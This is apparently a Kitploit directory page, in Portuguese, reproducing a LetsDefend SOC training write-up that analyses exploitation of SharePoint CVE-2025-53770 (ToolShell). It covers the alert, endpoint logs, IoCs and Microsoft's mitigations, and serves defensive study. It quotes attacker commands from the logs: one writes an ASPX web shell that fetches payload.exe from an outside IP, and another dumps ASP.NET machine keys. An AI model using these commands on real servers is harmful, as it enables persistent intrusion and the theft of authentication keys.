Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
-SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE — Uma atividade para treinar habilidades de análise e elaboração de relatórios | Kitploit
Ferramentas/GitHubGitHub/bossnick98/-soc342---cve-2025-53770-sharepoint-toolshell-auth-bypass-and-rce
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebAnálise ForenseInteligência de AmeaçasAprendizado e EducaçãoResposta a IncidentesLabs e Prática

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
bossnick98/-soc342---cve-2025-53770-sharepoint-toolshell-auth-bypass-and-rce

-SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE

Uma atividade para treinar habilidades de análise e elaboração de relatórios

Ver Repositório
há 1 anoAinda não revisado

SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE

Esta é uma investigação conduzida na plataforma Let's Defend, baseada em um CVE recente do SharePoint. Vamos dar uma olhada.

Immagine 2025-07-27 162109
  1. Examine o nome da regra. Os nomes das regras geralmente são criados especificamente para o ataque a ser detectado. Ao examinar o nome da regra, você pode entender qual ataque está enfrentando.

A regra SOC342 detectou uma requisição POST não autenticada direcionada à página vulnerável ToolPane.aspx, apresentando:

um payload grande (Content-Length: 7699)

um referer suspeito (SignOut.aspx) provavelmente usado para ofuscar a origem

comportamento consistente com a exploração da vulnerabilidade ToolShell

  1. Detecte entre quais dois dispositivos o tráfego está ocorrendo.

Um usuário externo (IP: 107.191.58.76) enviou uma requisição manipulada para um servidor SharePoint interno (172.16.20.17).

Analise o log do nosso endpoint

2

Um processo w3wp.exe executando um comando PowerShell codificado pode indicar uma potencial exploração ou atividade pós-exploração (ex.: execução de um payload oculto).

Em um ambiente SharePoint, é importante verificar se esse comportamento é esperado ou se representa abuso.

O comando foi ofuscado usando base64

Immagine 2025-07-27 163800

Esse payload permite que o invasor extraia e imprima chaves de configuração críticas do ASP.NET da máquina em que é executado.

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs

"C:\Windows\System32\cmd.exe" /c echo <form runat="server"> <object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11"><param name="Command" value="Redirect"> <param name="Button" value="Test"> <param name="Url" value="http://107.191.58.76/payload.exe\"> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

Compila um executável a partir do código-fonte C# no servidor.

Cria um backdoor web (arquivo ASPX malicioso) no caminho do SharePoint que, quando visitado, permite que um payload externo seja executado ou baixado.

cmd.exe /c echo > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

Este comando cria um arquivo chamado spinstall0.aspx na pasta LAYOUTS do SharePoint e escreve nele o conteúdo (aqui é um placeholder representando o código de um webshell)

Este é o hash de spinstall0.apx 92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514

Vamos dar uma olhada no VirusTotal.

Immagine 2025-07-27 164912

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"

Este comando permite que o invasor acesse a configuração do aplicativo MachineKeySection, expondo chaves criptográficas sensíveis, como a chave de validação e a chave de descriptografia.

Essas chaves são críticas para a segurança do ASP.NET, protegendo itens como cookies de autenticação e ViewState.

A exposição ou recuperação dessas chaves pode permitir que invasores forjem tokens de autenticação, descriptografem dados protegidos ou realizem outros ataques contra o aplicativo web.

MITRE ATT&CK

mitre

Nota do analista:

O alerta foi gerado devido a uma atividade incomum do PowerShell observada em um servidor SharePoint, posteriormente determinada como uma tentativa de exploração direcionada ao CVE-2025-53770. O invasor inicialmente baixou e compilou um executável C# personalizado (payload.exe) usando o compilador C# (csc.exe), depois criou um webshell ASPX malicioso (spinstall0.aspx) dentro de um diretório do SharePoint acessível pela web. Em seguida, um comando PowerShell foi executado para recuperar chaves criptográficas sensíveis do servidor a partir da configuração via reflexão .NET. Essa sequência de ações sugere um ataque em várias fases, projetado para manter controle persistente e possivelmente forjar tokens de autenticação. O webshell foi verificado como malicioso com uma taxa de detecção de 39/62 no VirusTotal. O incidente é confirmado como um verdadeiro positivo, e medidas adicionais de contenção e remediação são recomendadas.

Immagine 2025-07-27 170751

Detalhe do CVE-2025-53770

A desserialização de dados não confiáveis no Microsoft SharePoint Server local permite que um invasor não autorizado execute código através de uma rede. A Microsoft está ciente de que existe um exploit para o CVE-2025-53770 em circulação. A Microsoft está preparando e testando completamente uma atualização abrangente para resolver essa vulnerabilidade. Enquanto isso, certifique-se de que a mitigação fornecida na documentação deste CVE esteja em vigor para que você esteja protegido contra exploração.

Immagine 2025-07-27 171020

Mitigação sugerida pela Microsoft: Para mitigar potenciais ataques, os clientes devem:

  1. Usar versões suportadas do SharePoint Server local

  2. Aplicar as atualizações de segurança mais recentes vinculadas acima.

  3. Implantar o Microsoft Defender para Endpoint ou soluções ameaçadoras equivalentes

  4. Garantir que a Interface de Verificação Antimalware (AMSI) esteja ativada e configurada corretamente, com uma solução antivírus apropriada, como o Defender Antivírus

  5. Rotacionar as chaves de máquina ASP.NET do SharePoint Server

IoC

Spinstall0.aspx Web shell usado pelos atores de ameaça

Os atores também modificaram o nome do arquivo de várias maneiras – como spinstall.aspx, spinstall1.aspx, spinstall2.aspx

Este relatório é baseado em uma atividade conduzida na plataforma Let's Defend. Todas as descobertas e materiais apresentados são apenas para fins educacionais. Todos os direitos e propriedade pertencem à Let's Defend.

Baixar ferramenta